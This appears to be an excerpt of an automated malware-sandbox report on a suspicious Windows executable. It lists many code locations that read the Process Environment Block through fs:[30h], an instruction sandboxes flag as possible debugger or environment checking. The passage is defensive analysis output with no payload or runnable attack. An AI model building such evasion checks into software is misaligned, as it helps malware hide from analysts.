Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A3C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A3C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A783C0 mov eax, dword ptr fs:[00000030h]	9_2_01A783C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A783C0 mov eax, dword ptr fs:[00000030h]	9_2_01A783C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A783C0 mov eax, dword ptr fs:[00000030h]	9_2_01A783C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A783C0 mov eax, dword ptr fs:[00000030h]	9_2_01A783C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E3DB mov eax, dword ptr fs:[00000030h]	9_2_01B1E3DB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E3DB mov eax, dword ptr fs:[00000030h]	9_2_01B1E3DB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E3DB mov ecx, dword ptr fs:[00000030h]	9_2_01B1E3DB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E3DB mov eax, dword ptr fs:[00000030h]	9_2_01B1E3DB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF63C0 mov eax, dword ptr fs:[00000030h]	9_2_01AF63C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2C3CD mov eax, dword ptr fs:[00000030h]	9_2_01B2C3CD
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA30B mov eax, dword ptr fs:[00000030h]	9_2_01AAA30B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA30B mov eax, dword ptr fs:[00000030h]	9_2_01AAA30B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA30B mov eax, dword ptr fs:[00000030h]	9_2_01AAA30B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6C310 mov ecx, dword ptr fs:[00000030h]	9_2_01A6C310
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A90310 mov ecx, dword ptr fs:[00000030h]	9_2_01A90310
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1437C mov eax, dword ptr fs:[00000030h]	9_2_01B1437C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3A352 mov eax, dword ptr fs:[00000030h]	9_2_01B3A352
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B18350 mov ecx, dword ptr fs:[00000030h]	9_2_01B18350
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF2349 mov eax, dword ptr fs:[00000030h]	9_2_01AF2349
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF035C mov eax, dword ptr fs:[00000030h]	9_2_01AF035C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF035C mov eax, dword ptr fs:[00000030h]	9_2_01AF035C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF035C mov eax, dword ptr fs:[00000030h]	9_2_01AF035C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF035C mov ecx, dword ptr fs:[00000030h]	9_2_01AF035C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF035C mov eax, dword ptr fs:[00000030h]	9_2_01AF035C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF035C mov eax, dword ptr fs:[00000030h]	9_2_01AF035C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B4634F mov eax, dword ptr fs:[00000030h]	9_2_01B4634F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A802A0 mov eax, dword ptr fs:[00000030h]	9_2_01A802A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A802A0 mov eax, dword ptr fs:[00000030h]	9_2_01A802A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B062A0 mov eax, dword ptr fs:[00000030h]	9_2_01B062A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B062A0 mov ecx, dword ptr fs:[00000030h]	9_2_01B062A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B062A0 mov eax, dword ptr fs:[00000030h]	9_2_01B062A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B062A0 mov eax, dword ptr fs:[00000030h]	9_2_01B062A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B062A0 mov eax, dword ptr fs:[00000030h]	9_2_01B062A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B062A0 mov eax, dword ptr fs:[00000030h]	9_2_01B062A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF0283 mov eax, dword ptr fs:[00000030h]	9_2_01AF0283
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF0283 mov eax, dword ptr fs:[00000030h]	9_2_01AF0283
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF0283 mov eax, dword ptr fs:[00000030h]	9_2_01AF0283
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE284 mov eax, dword ptr fs:[00000030h]	9_2_01AAE284
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE284 mov eax, dword ptr fs:[00000030h]	9_2_01AAE284
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A802E1 mov eax, dword ptr fs:[00000030h]	9_2_01A802E1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A802E1 mov eax, dword ptr fs:[00000030h]	9_2_01A802E1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A802E1 mov eax, dword ptr fs:[00000030h]	9_2_01A802E1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B462D6 mov eax, dword ptr fs:[00000030h]	9_2_01B462D6
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A7A2C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A7A2C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A7A2C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A7A2C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A7A2C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6823B mov eax, dword ptr fs:[00000030h]	9_2_01A6823B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274 mov eax, dword ptr fs:[00000030h]	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A74260 mov eax, dword ptr fs:[00000030h]	9_2_01A74260
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A74260 mov eax, dword ptr fs:[00000030h]	9_2_01A74260
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A74260 mov eax, dword ptr fs:[00000030h]	9_2_01A74260
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6826B mov eax, dword ptr fs:[00000030h]	9_2_01A6826B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2A250 mov eax, dword ptr fs:[00000030h]	9_2_01B2A250
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2A250 mov eax, dword ptr fs:[00000030h]	9_2_01B2A250
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B4625D mov eax, dword ptr fs:[00000030h]	9_2_01B4625D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF8243 mov eax, dword ptr fs:[00000030h]	9_2_01AF8243
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF8243 mov ecx, dword ptr fs:[00000030h]	9_2_01AF8243
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6A250 mov eax, dword ptr fs:[00000030h]	9_2_01A6A250
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A76259 mov eax, dword ptr fs:[00000030h]	9_2_01A76259
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF05A7 mov eax, dword ptr fs:[00000030h]	9_2_01AF05A7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF05A7 mov eax, dword ptr fs:[00000030h]	9_2_01AF05A7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF05A7 mov eax, dword ptr fs:[00000030h]	9_2_01AF05A7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A945B1 mov eax, dword ptr fs:[00000030h]	9_2_01A945B1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A945B1 mov eax, dword ptr fs:[00000030h]	9_2_01A945B1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA4588 mov eax, dword ptr fs:[00000030h]	9_2_01AA4588
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A72582 mov eax, dword ptr fs:[00000030h]	9_2_01A72582
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A72582 mov ecx, dword ptr fs:[00000030h]	9_2_01A72582
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE59C mov eax, dword ptr fs:[00000030h]	9_2_01AAE59C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A725E0 mov eax, dword ptr fs:[00000030h]	9_2_01A725E0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC5ED mov eax, dword ptr fs:[00000030h]	9_2_01AAC5ED
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC5ED mov eax, dword ptr fs:[00000030h]	9_2_01AAC5ED
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A9E5E7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE5CF mov eax, dword ptr fs:[00000030h]	9_2_01AAE5CF
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE5CF mov eax, dword ptr fs:[00000030h]	9_2_01AAE5CF
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A765D0 mov eax, dword ptr fs:[00000030h]	9_2_01A765D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA5D0 mov eax, dword ptr fs:[00000030h]	9_2_01AAA5D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA5D0 mov eax, dword ptr fs:[00000030h]	9_2_01AAA5D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E53E mov eax, dword ptr fs:[00000030h]	9_2_01A9E53E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E53E mov eax, dword ptr fs:[00000030h]	9_2_01A9E53E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E53E mov eax, dword ptr fs:[00000030h]	9_2_01A9E53E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E53E mov eax, dword ptr fs:[00000030h]	9_2_01A9E53E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9E53E mov eax, dword ptr fs:[00000030h]	9_2_01A9E53E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80535 mov eax, dword ptr fs:[00000030h]	9_2_01A80535
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80535 mov eax, dword ptr fs:[00000030h]	9_2_01A80535
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80535 mov eax, dword ptr fs:[00000030h]	9_2_01A80535
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80535 mov eax, dword ptr fs:[00000030h]	9_2_01A80535
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80535 mov eax, dword ptr fs:[00000030h]	9_2_01A80535
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80535 mov eax, dword ptr fs:[00000030h]	9_2_01A80535
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B06500 mov eax, dword ptr fs:[00000030h]	9_2_01B06500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44500 mov eax, dword ptr fs:[00000030h]	9_2_01B44500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44500 mov eax, dword ptr fs:[00000030h]	9_2_01B44500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44500 mov eax, dword ptr fs:[00000030h]	9_2_01B44500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44500 mov eax, dword ptr fs:[00000030h]	9_2_01B44500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44500 mov eax, dword ptr fs:[00000030h]	9_2_01B44500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44500 mov eax, dword ptr fs:[00000030h]	9_2_01B44500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44500 mov eax, dword ptr fs:[00000030h]	9_2_01B44500
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA656A mov eax, dword ptr fs:[00000030h]	9_2_01AA656A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA656A mov eax, dword ptr fs:[00000030h]	9_2_01AA656A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA656A mov eax, dword ptr fs:[00000030h]	9_2_01AA656A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78550 mov eax, dword ptr fs:[00000030h]	9_2_01A78550
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A78550 mov eax, dword ptr fs:[00000030h]	9_2_01A78550
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A764AB mov eax, dword ptr fs:[00000030h]	9_2_01A764AB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA44B0 mov ecx, dword ptr fs:[00000030h]	9_2_01AA44B0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFA4B0 mov eax, dword ptr fs:[00000030h]	9_2_01AFA4B0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2A49A mov eax, dword ptr fs:[00000030h]	9_2_01B2A49A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A704E5 mov ecx, dword ptr fs:[00000030h]	9_2_01A704E5
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6C427 mov eax, dword ptr fs:[00000030h]	9_2_01A6C427
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6E420 mov eax, dword ptr fs:[00000030h]	9_2_01A6E420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6E420 mov eax, dword ptr fs:[00000030h]	9_2_01A6E420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6E420 mov eax, dword ptr fs:[00000030h]	9_2_01A6E420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6420 mov eax, dword ptr fs:[00000030h]	9_2_01AF6420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6420 mov eax, dword ptr fs:[00000030h]	9_2_01AF6420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6420 mov eax, dword ptr fs:[00000030h]	9_2_01AF6420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6420 mov eax, dword ptr fs:[00000030h]	9_2_01AF6420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6420 mov eax, dword ptr fs:[00000030h]	9_2_01AF6420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6420 mov eax, dword ptr fs:[00000030h]	9_2_01AF6420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6420 mov eax, dword ptr fs:[00000030h]	9_2_01AF6420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAA430 mov eax, dword ptr fs:[00000030h]	9_2_01AAA430
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA8402 mov eax, dword ptr fs:[00000030h]	9_2_01AA8402
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA8402 mov eax, dword ptr fs:[00000030h]	9_2_01AA8402
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA8402 mov eax, dword ptr fs:[00000030h]	9_2_01AA8402
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFC460 mov ecx, dword ptr fs:[00000030h]	9_2_01AFC460
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9A470 mov eax, dword ptr fs:[00000030h]	9_2_01A9A470
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9A470 mov eax, dword ptr fs:[00000030h]	9_2_01A9A470
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9A470 mov eax, dword ptr fs:[00000030h]	9_2_01A9A470
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2A456 mov eax, dword ptr fs:[00000030h]	9_2_01B2A456
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE443 mov eax, dword ptr fs:[00000030h]	9_2_01AAE443
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9245A mov eax, dword ptr fs:[00000030h]	9_2_01A9245A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6645D mov eax, dword ptr fs:[00000030h]	9_2_01A6645D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A707AF mov eax, dword ptr fs:[00000030h]	9_2_01A707AF
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B247A0 mov eax, dword ptr fs:[00000030h]	9_2_01B247A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1678E mov eax, dword ptr fs:[00000030h]	9_2_01B1678E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A927ED mov eax, dword ptr fs:[00000030h]	9_2_01A927ED
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A927ED mov eax, dword ptr fs:[00000030h]	9_2_01A927ED
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A927ED mov eax, dword ptr fs:[00000030h]	9_2_01A927ED
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFE7E1 mov eax, dword ptr fs:[00000030h]	9_2_01AFE7E1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A747FB mov eax, dword ptr fs:[00000030h]	9_2_01A747FB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A747FB mov eax, dword ptr fs:[00000030h]	9_2_01A747FB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7C7C0 mov eax, dword ptr fs:[00000030h]	9_2_01A7C7C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF07C3 mov eax, dword ptr fs:[00000030h]	9_2_01AF07C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC720 mov eax, dword ptr fs:[00000030h]	9_2_01AAC720
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAC720 mov eax, dword ptr fs:[00000030h]	9_2_01AAC720
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA273C mov eax, dword ptr fs:[00000030h]	9_2_01AA273C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA273C mov ecx, dword ptr fs:[00000030h]	9_2_01AA273C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA273C mov eax, dword ptr fs:[00000030h]	9_2_01AA273C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEC730 mov eax, dword ptr fs:[00000030h]	9_2_01AEC730
